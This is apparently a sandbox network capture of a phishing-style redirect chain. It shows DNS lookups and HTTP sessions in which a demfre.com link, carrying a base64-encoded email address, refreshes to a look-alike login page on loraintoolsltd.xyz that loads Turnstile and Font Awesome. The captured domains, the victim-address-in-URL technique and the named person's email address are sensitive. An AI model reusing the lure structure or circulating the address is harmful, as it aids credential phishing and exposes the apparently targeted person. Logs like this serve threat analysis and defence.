Jan 24, 2025 00:03:19.039764881 CET	50184	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:19.046107054 CET	53	53207	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:19.046209097 CET	53	54422	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:19.046515942 CET	53	58700	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:19.046684980 CET	53	50184	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:20.394046068 CET	58070	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:20.395123005 CET	60976	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:20.401135921 CET	53	58070	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:20.401834011 CET	53	60976	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:20.416448116 CET	62920	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:20.416793108 CET	63377	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:20.423283100 CET	53	62920	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:20.423399925 CET	53	63377	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:22.636547089 CET	56122	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:22.636691093 CET	57505	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:22.643903017 CET	53	56122	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:22.644056082 CET	53	57505	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:29.187994957 CET	53	51463	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:42.594523907 CET	57826	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:42.594680071 CET	64773	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:42.605068922 CET	53	64773	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:42.605521917 CET	53	57826	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:46.633845091 CET	62424	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:46.634052992 CET	49933	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:46.640873909 CET	53	62424	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:46.662697077 CET	53	49933	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:46.750226021 CET	61761	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:46.750356913 CET	55256	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:46.762448072 CET	53	55256	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:46.764727116 CET	53	61761	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:48.251674891 CET	53	61772	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:51.331187963 CET	53	51133	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:52.660692930 CET	64853	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:52.660867929 CET	62111	53	192.168.2.5	1.1.1.1
Jan 24, 2025 00:03:52.672508001 CET	53	62111	1.1.1.1	192.168.2.5
Jan 24, 2025 00:03:52.673968077 CET	53	64853	1.1.1.1	192.168.2.5
Jan 24, 2025 00:04:10.704374075 CET	53	58018	1.1.1.1	192.168.2.5
Jan 24, 2025 00:04:11.453319073 CET	53	58252	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jan 24, 2025 00:03:17.254013062 CET	493	OUT	GET /lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292 HTTP/1.1 Host: demfre.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 24, 2025 00:03:17.967689037 CET	298	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:17 GMT Server: Apache refresh: 0;url=https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8
Jan 24, 2025 00:03:18.009598017 CET	432	OUT	GET /favicon.ico HTTP/1.1 Host: demfre.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 24, 2025 00:03:18.238223076 CET	186	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:18 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Jan 24, 2025 00:03:18.898083925 CET	274	OUT	GET /favicon.ico HTTP/1.1 Host: demfre.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 24, 2025 00:03:19.613039017 CET	212	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:18 UTC	690	OUT	GET /FgJIoRDm HTTP/1.1 Host: login.loraintoolsltd.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://demfre.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:18 UTC	17	IN	HTTP/1.1 200 OK
2025-01-23 23:03:18 UTC	19	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a Data Ascii: Connection: close
2025-01-23 23:03:18 UTC	25	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a Data Ascii: Content-Type: text/html
2025-01-23 23:03:18 UTC	162	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 62 37 34 37 2d 36 61 36 66 3d 34 34 64 30 31 61 61 61 30 64 34 30 63 64 62 61 64 37 34 31 38 64 64 62 39 39 62 37 63 66 66 36 34 38 36 65 39 38 31 37 66 30 66 66 61 63 35 63 61 61 36 38 61 33 31 30 32 36 61 35 34 63 62 38 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 3b 20 45 78 70 69 72 65 73 3d 46 72 69 2c 20 32 34 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 30 33 3a 31 38 20 47 4d 54 0d 0a Data Ascii: Set-Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; Path=/; Domain=loraintoolsltd.xyz; Expires=Fri, 24 Jan 2025 00:03:18 GMT
2025-01-23 23:03:18 UTC	28	IN	Data Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a Data Ascii: Transfer-Encoding: chunked
2025-01-23 23:03:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-23 23:03:18 UTC	6	IN	Data Raw: 31 33 66 36 0d 0a Data Ascii: 13f6
2025-01-23 23:03:18 UTC	5110	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 34 2f 63 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/c
2025-01-23 23:03:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-23 23:03:18 UTC	3	IN	Data Raw: 30 0d 0a Data Ascii: 0
2025-01-23 23:03:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:19 UTC	587	OUT	GET /ajax/libs/font-awesome/5.15.4/css/all.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:19 UTC	943	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:19 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"613fa20b-3171" Last-Modified: Mon, 13 Sep 2021 19:10:03 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 87927 Expires: Tue, 13 Jan 2026 23:03:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqFzKWRFKpxF9eXYgobF6mkBiy6puXRFVpy2gbATKM0u8e9yVmEvl8ilr2HhF0BkkGTb%2B1JNn0Dhu0dMVxbOEnBjxKqQT%2FCo8YWeiV3CBGlPrlbhW7wmhLZa%2FUtniumYEImN4hnt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 906b6a9b8862437f-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:19 UTC	426	IN	Data Raw: 37 63 30 32 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 34 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2e 66 61 2c 2e 66 61 62 2c 2e 66 61 64 2c 2e 66 61 6c 2c 2e 66 61 72 2c 2e 66 61 73 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b Data Ascii: 7c02/! Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 2e 30 36 36 37 65 6d 7d 2e 66 61 2d 78 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 7d 2e 66 61 2d 73 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 66 61 2d 35 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 65 6d 7d 2e 66 61 2d 36 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 65 6d 7d 2e 66 61 2d 37 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 65 6d 7d 2e 66 61 2d 38 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 65 6d 7d 2e 66 61 2d 39 78 7b 66 6f 6e 74 2d 73 69 Data Ascii: m;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-si
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 31 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 31 38 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 32 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 32 37 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f Data Ascii: t.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"pro
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3a 22 5c 66 33 36 39 22 7d 2e 66 61 2d 61 63 71 75 69 73 69 74 69 6f 6e 73 2d 69 6e 63 6f 72 70 6f 72 61 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 61 66 22 7d 2e 66 61 2d 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 31 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 39 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 62 22 7d 2e 66 61 2d 61 64 6a 75 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 32 22 7d 2e 66 61 2d 61 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 30 22 7d 2e 66 61 2d 61 64 76 65 72 73 61 6c 3a Data Ascii: ntent:"\f369"}.fa-acquisitions-incorporated:before{content:"\f6af"}.fa-ad:before{content:"\f641"}.fa-address-book:before{content:"\f2b9"}.fa-address-card:before{content:"\f2bb"}.fa-adjust:before{content:"\f042"}.fa-adn:before{content:"\f170"}.fa-adversal:
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 66 33 36 65 22 7d 2e 66 61 2d 61 6e 67 75 6c 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 30 22 7d 2e 66 61 2d 61 6e 6b 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 34 22 7d 2e 66 61 2d 61 70 70 2d 73 74 6f 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 36 66 22 7d 2e 66 61 2d 61 70 70 2d 73 74 6f 72 65 2d 69 6f 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 30 22 7d 2e 66 61 2d 61 70 70 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 31 22 7d 2e 66 61 2d 61 70 70 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 39 22 7d 2e 66 61 2d 61 70 70 6c 65 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 31 22 7d 2e Data Ascii: f36e"}.fa-angular:before{content:"\f420"}.fa-ankh:before{content:"\f644"}.fa-app-store:before{content:"\f36f"}.fa-app-store-ios:before{content:"\f370"}.fa-apper:before{content:"\f371"}.fa-apple:before{content:"\f179"}.fa-apple-alt:before{content:"\f5d1"}.
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3a 22 5c 66 32 39 65 22 7d 2e 66 61 2d 61 75 74 6f 70 72 65 66 69 78 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 31 63 22 7d 2e 66 61 2d 61 76 69 61 6e 65 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 34 22 7d 2e 66 61 2d 61 76 69 61 74 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 31 22 7d 2e 66 61 2d 61 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 39 22 7d 2e 66 61 2d 61 77 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 35 22 7d 2e 66 61 2d 62 61 62 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 63 22 7d 2e 66 61 2d 62 61 62 79 2d 63 61 72 72 69 61 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 Data Ascii: ntent:"\f29e"}.fa-autoprefixer:before{content:"\f41c"}.fa-avianex:before{content:"\f374"}.fa-aviato:before{content:"\f421"}.fa-award:before{content:"\f559"}.fa-aws:before{content:"\f375"}.fa-baby:before{content:"\f77c"}.fa-baby-carriage:before{content:"\f
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 62 22 7d 2e 66 61 2d 62 69 62 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 34 37 22 7d 2e 66 61 2d 62 69 63 79 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 36 22 7d 2e 66 61 2d 62 69 6b 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 34 61 22 7d 2e 66 61 2d 62 69 6d 6f 62 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 37 38 22 7d 2e 66 61 2d 62 69 6e 6f 63 75 6c 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 35 22 7d 2e 66 61 2d 62 69 6f 68 61 7a 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 38 30 22 7d 2e 66 61 2d 62 69 72 74 68 64 61 79 2d 63 61 6b Data Ascii: e:before{content:"\f55b"}.fa-bible:before{content:"\f647"}.fa-bicycle:before{content:"\f206"}.fa-biking:before{content:"\f84a"}.fa-bimobject:before{content:"\f378"}.fa-binoculars:before{content:"\f1e5"}.fa-biohazard:before{content:"\f780"}.fa-birthday-cak
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 39 65 22 7d 2e 66 61 2d 62 6f 78 2d 74 69 73 73 75 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 62 22 7d 2e 66 61 2d 62 6f 78 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 36 38 22 7d 2e 66 61 2d 62 72 61 69 6c 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 31 22 7d 2e 66 61 2d 62 72 61 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 63 22 7d 2e 66 61 2d 62 72 65 61 64 2d 73 6c 69 63 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 65 63 22 7d 2e 66 61 2d 62 72 69 65 66 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 62 31 22 7d 2e 66 61 2d 62 72 69 65 66 63 61 73 65 2d 6d 65 64 69 63 Data Ascii: fore{content:"\f49e"}.fa-box-tissue:before{content:"\e05b"}.fa-boxes:before{content:"\f468"}.fa-braille:before{content:"\f2a1"}.fa-brain:before{content:"\f5dc"}.fa-bread-slice:before{content:"\f7ec"}.fa-briefcase:before{content:"\f0b1"}.fa-briefcase-medic
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 66 37 38 35 22 7d 2e 66 61 2d 63 61 6e 64 79 2d 63 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 38 36 22 7d 2e 66 61 2d 63 61 6e 6e 61 62 69 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 66 22 7d 2e 66 61 2d 63 61 70 73 75 6c 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 36 62 22 7d 2e 66 61 2d 63 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 39 22 7d 2e 66 61 2d 63 61 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 65 22 7d 2e 66 61 2d 63 61 72 2d 62 61 74 74 65 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 64 66 22 7d 2e 66 61 2d 63 61 72 2d 63 72 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 65 Data Ascii: f785"}.fa-candy-cane:before{content:"\f786"}.fa-cannabis:before{content:"\f55f"}.fa-capsules:before{content:"\f46b"}.fa-car:before{content:"\f1b9"}.fa-car-alt:before{content:"\f5de"}.fa-car-battery:before{content:"\f5df"}.fa-car-crash:before{content:"\f5e
2025-01-23 23:03:19 UTC	1369	IN	Data Raw: 7d 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 62 22 7d 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 2d 74 65 61 63 68 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 63 22 7d 2e 66 61 2d 63 68 61 72 67 69 6e 67 2d 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 65 37 22 7d 2e 66 61 2d 63 68 61 72 74 2d 61 72 65 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 66 65 22 7d 2e 66 61 2d 63 68 61 72 74 2d 62 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 38 30 22 7d 2e 66 61 2d 63 68 61 72 74 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 31 22 7d 2e 66 61 2d 63 68 61 72 74 2d 70 69 65 Data Ascii: }.fa-chalkboard:before{content:"\f51b"}.fa-chalkboard-teacher:before{content:"\f51c"}.fa-charging-station:before{content:"\f5e7"}.fa-chart-area:before{content:"\f1fe"}.fa-chart-bar:before{content:"\f080"}.fa-chart-line:before{content:"\f201"}.fa-chart-pie

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:19 UTC	583	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:19 UTC	386	IN	HTTP/1.1 302 Found Date: Thu, 23 Jan 2025 23:03:19 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/725bd36e298b/api.js Server: cloudflare CF-RAY: 906b6a9b88dc42f2-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:20 UTC	567	OUT	GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
